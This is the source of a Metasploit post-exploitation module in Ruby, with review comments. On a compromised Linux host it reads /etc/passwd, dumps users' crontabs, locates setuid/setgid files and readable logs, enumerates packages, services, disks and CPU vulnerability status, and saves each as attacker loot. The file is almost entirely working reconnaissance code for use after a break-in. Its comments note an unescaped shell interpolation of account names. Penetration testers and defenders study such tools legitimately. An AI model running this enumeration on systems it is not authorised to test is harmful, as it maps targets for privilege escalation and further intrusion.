##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
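class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather System and User Information',
        'Description' => %q{
          This module gathers system information. We collect
          installed packages, installed services, mount information,
          user list, user bash history and cron jobs
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux
          'sinn3r', # Testing and modification of original enum_linux
          'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
          'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Entry point. Collects distribution, account, package, service, cron,
  # disk, log-file, setuid/setgid and CPU-vulnerability details from the
  # session host and stores each one as a separate loot item.
  #
  # NOTE(review): the module Description mentions user bash history, but
  # nothing below collects it.
  def run
    distro = get_sysinfo
    store_loot(
      'linux.version',
      'text/plain',
      session,
      "Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
      'linux_info.txt',
      'Linux Version'
    )

    # Print the info
    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    # Account names, one per line, as read from the target's passwd file.
    users = execute('/bin/cat /etc/passwd | cut -d : -f 1')
    # Trailing whitespace in the command output would defeat the
    # `user == 'root'` comparison in #get_crons, so normalise it once here.
    user = execute('/usr/bin/whoami').strip

    print_good("\tModule running as \"#{user}\" user")

    installed_pkg = get_packages(distro[:distro])
    installed_svc = get_services(distro[:distro])

    mount = execute('/bin/mount -l')
    crons = get_crons(users, user)
    diskspace = execute('/bin/df -ahT')
    disks = mount + "\n\n" + diskspace
    # World-readable files under /var/log.
    logfiles = execute('find /var/log -type f -perm -4 2> /dev/null')
    # `-perm +6000` is the deprecated GNU spelling; fall back to `-perm /6000`
    # on a find(1) that rejects it.
    uidgid = execute('find / -xdev -type f -perm +6000 -perm -1 2> /dev/null || find / -xdev -type f -perm /6000 -perm -1 2> /dev/null')

    # distro is the hash returned by get_sysinfo, not the formatted text
    # stored above; kept as-is so existing loot contents do not change.
    save('Linux version', distro)
    save('User accounts', users)
    save('Installed Packages', installed_pkg)
    save('Running Services', installed_svc)
    save('Cron jobs', crons)
    save('Disk info', disks)
    save('Logfiles', logfiles)
    save('Setuid/setgid files', uidgid)
    save('CPU Vulnerabilities', get_cpu_vulnerabilities)
  end

  # Stores +data+ as loot of type 'linux.enum.system' and reports the path.
  #
  # @param msg [String] human-readable label, also used as the loot info
  # @param data [Object] loot contents
  # @param ctype [String] MIME type of the loot
  # @return [void]
  def save(msg, data, ctype = 'text/plain')
    ltype = 'linux.enum.system'
    loot = store_loot(ltype, ctype, session, data, nil, msg)
    print_status("#{msg} stored in #{loot}")
  end

  # Runs +cmd+ on the session host and returns its output.
  #
  # @param cmd [String] shell command line
  # @return [String] command output; an empty string when cmd_exec yields nil,
  #   so callers can concatenate without a nil check
  def execute(cmd)
    vprint_status("Execute: #{cmd}")
    cmd_exec(cmd).to_s
  end

  # Lists installed packages with the package manager matching +distro+.
  #
  # @param distro [String] distribution name from get_sysinfo
  # @return [String] package listing, or '' when the distribution is unknown
  def get_packages(distro)
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      execute('rpm -qa')
    when /slackware/
      execute('/bin/ls /var/log/packages')
    when /ubuntu|debian/
      execute('/usr/bin/dpkg -l')
    when /gentoo/
      execute('equery list')
    when /arch/
      execute('/usr/bin/pacman -Q')
    else
      print_error('Could not determine package manager to get list of installed packages')
      ''
    end
  end

  # Lists configured services with the init tooling matching +distro+.
  #
  # @param distro [String] distribution name from get_sysinfo
  # @return [String] service listing, or '' when the distribution is unknown
  def get_services(distro)
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      execute('/sbin/chkconfig --list')
    when /slackware/
      # Slackware has no single listing command: executable rc.d scripts are
      # enabled, non-executable ones disabled.
      enabled = execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
      disabled = execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
      "\nEnabled:\n*************************\n" \
        "#{enabled}" \
        "\n\nDisabled:\n*************************\n" \
        "#{disabled}"
    when /ubuntu|debian/
      execute('/usr/sbin/service --status-all')
    when /gentoo/
      execute('/bin/rc-status --all')
    when /arch/
      execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
    else
      print_error('Could not determine the Linux Distribution to get list of configured services')
      ''
    end
  end

  # Dumps every entry under /sys/devices/system/cpu/vulnerabilities.
  #
  # @return [String] one "<file>:<status>" line per mitigation entry
  def get_cpu_vulnerabilities
    execute('grep -r . /sys/devices/system/cpu/vulnerabilities')
  end

  # Collects crontab listings. When the session runs as root, the crontab
  # of every account in +users+ is listed with `crontab -u`; otherwise only
  # the current user's crontab is listed.
  #
  # @param users [String, nil] whitespace-separated account names
  # @param user [String] name of the account the session runs as
  # @return [String] concatenated crontab output
  def get_crons(users, user)
    unless user == 'root' && users
      vprint_status("Enumerating as #{user}")
      cron_data = "***** Listing cron jobs for #{user} *****\n\n"
      cron_data << execute('crontab -l')
      return cron_data
    end

    vprint_status('Enumerating as root')
    # Previously the listing was built inside an `each` block and the block's
    # own result (the user array) was returned instead of the text.
    cron_data = ''
    users.chomp.split.each do |usr|
      # usr comes straight from the target's passwd file and is interpolated
      # unescaped; an account name containing shell metacharacters would
      # break (or alter) this command line.
      cron_data << "*****Listing cron jobs for #{usr}*****\n"
      cron_data << execute("crontab -u #{usr} -l") + "\n\n"
    end
    cron_data
  end
end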